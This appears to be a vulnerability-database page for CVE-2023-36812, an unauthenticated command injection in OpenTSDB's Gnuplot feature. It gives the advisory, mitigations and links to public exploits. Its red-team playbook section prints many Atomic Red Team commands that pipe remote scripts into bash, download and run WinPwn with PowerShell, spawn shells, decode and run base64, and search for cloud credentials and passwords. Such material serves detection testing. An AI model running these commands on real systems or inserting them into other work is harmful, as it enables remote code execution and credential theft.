CVE-2023-36812
Overview
The vulnerability in OpenTSDB arises from improper handling of user-controlled input that is written directly into the Gnuplot configuration file. This results in a command injection vulnerability within the component responsible for generating and executing Gnuplot scripts. Specifically, the feature that integrates Gnuplot for data visualization lacks sufficient input sanitization, allowing malicious input to influence shell commands executed by the system.
Vulnerability Description
OpenTSDB is a open source, distributed, scalable Time Series Database (TSDB). OpenTSDB is vulnerable to Remote Code Execution vulnerability by writing user-controlled input to Gnuplot configuration file and running Gnuplot with the generated configuration. This issue has been patched in commit `07c4641471c` and further refined in commit `fa88d3e4b`. These patches are available in the `2.4.2` release. Users are advised to upgrade. User unable to upgrade may disable Gunuplot via the config option`tsd.core.enable_ui = true` and remove the shell files `mygnuplot.bat` and `mygnuplot.sh`.
Impact
An attacker with network access and no authentication can leverage this vulnerability to execute arbitrary commands on the OpenTSDB server, potentially gaining full control over the affected system. This can lead to unauthorized data access, service disruption, or lateral movement within the network. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms that exploitation requires no privileges or user interaction, increasing the severity and ease of attack.
Solution
Users should upgrade OpenTSDB to version 2.4.2 or later, where the vulnerability is patched as documented in the GitHub security advisory GHSA-76f7-9v52-v2fw. For environments where upgrading is not immediately feasible, the vendor recommends disabling Gnuplot integration by setting tsd.core.enable_ui to true in the configuration and removing the shell scripts mygnuplot.bat and mygnuplot.sh. Detailed patch instructions and advisory information are available at the official OpenTSDB GitHub security advisory page.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in OpenTSDB arises from a critical flaw that allows for remote code execution through the manipulation of user-controlled input directed at the Gnuplot configuration file. This vulnerability is particularly concerning as it enables an attacker to execute arbitrary commands on the server hosting the database. The exploitation process typically involves crafting malicious input that, when processed by OpenTSDB, results in the generation of a compromised Gnuplot configuration. The subsequent execution of Gnuplot with this configuration can lead to unauthorized access and control over the affected system. The severity of this issue is underscored by its high CVSS score, indicating a significant risk to users of the software.
Attack vectors for this vulnerability are diverse, primarily leveraging the web interface of OpenTSDB. An attacker could exploit the vulnerability by submitting specially crafted requests that include malicious payloads. Once the payload is processed, the attacker could gain the ability to execute arbitrary commands on the server, potentially leading to data exfiltration, system compromise, or further lateral movement within the network. Scenarios could involve an attacker gaining access to sensitive data stored in the database or using the compromised server as a launch point for additional attacks against other systems within the organization.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on OpenTSDB for time-series data management. The potential for remote code execution poses a significant business risk, as it could lead to data breaches, loss of intellectual property, and damage to reputation. Organizations could face regulatory scrutiny and financial penalties if sensitive data is compromised. Furthermore, the operational disruption caused by an attack could result in significant downtime, affecting business continuity and customer trust. The high likelihood of exploitation, combined with the critical nature of the data managed by OpenTSDB, makes this vulnerability a priority for organizations using this software.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First and foremost, upgrading to the patched version of OpenTSDB is essential to eliminate the vulnerability entirely. For users unable to upgrade immediately, disabling Gnuplot through the configuration option is a temporary measure that can reduce risk. Additionally, organizations should conduct regular security assessments and vulnerability scans to identify and remediate potential weaknesses in their systems. Implementing strict input validation and sanitization measures can also help prevent the exploitation of similar vulnerabilities in the future. Monitoring logs for unusual activity and employing intrusion detection systems can further enhance an organization's security posture.
In conclusion, the vulnerability present in OpenTSDB represents a critical risk that necessitates immediate attention from affected organizations. The potential for remote code execution through user-controlled input highlights the importance of maintaining up-to-date software and implementing robust security measures. By understanding the technical details, recognizing the attack vectors, assessing the real-world impact, and employing effective detection and mitigation strategies, organizations can better protect themselves against the threats posed by this vulnerability and ensure the integrity and security of their data management systems.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Opentsdb | Opentsdb | All |
cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
OpenTSDB 2.4.1 unauthenticated command injection
exploits/linux/http/opentsdb_key_cmd_injection
|
Gal Goldstein, Daniel Abeles, Erik Wynter | Unknown | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ErikWynter/opentsdb_key_cmd_injection
An exploit for OpenTSDB <= 2.4.1 cmd injection (CVE-2023-36812/CVE-2023-25826) written in Fortran
|
ErikWynter | 7 | 1 | 2023-09-07 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
2 eventsProof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-36812 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/OpenTSDB/opentsdb/security/advisories/GHSA-76f7-9v52-v2fw |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/OpenTSDB/opentsdb/commit/07c4641471c6f5c2ab5aab615969e97211eb50d9 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/OpenTSDB/opentsdb/commit/fa88d3e4b5369f9fb73da384fab0b23e246309ba |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/174570/OpenTSDB-2.4.1-Unauthenticated-Command-Injection.html |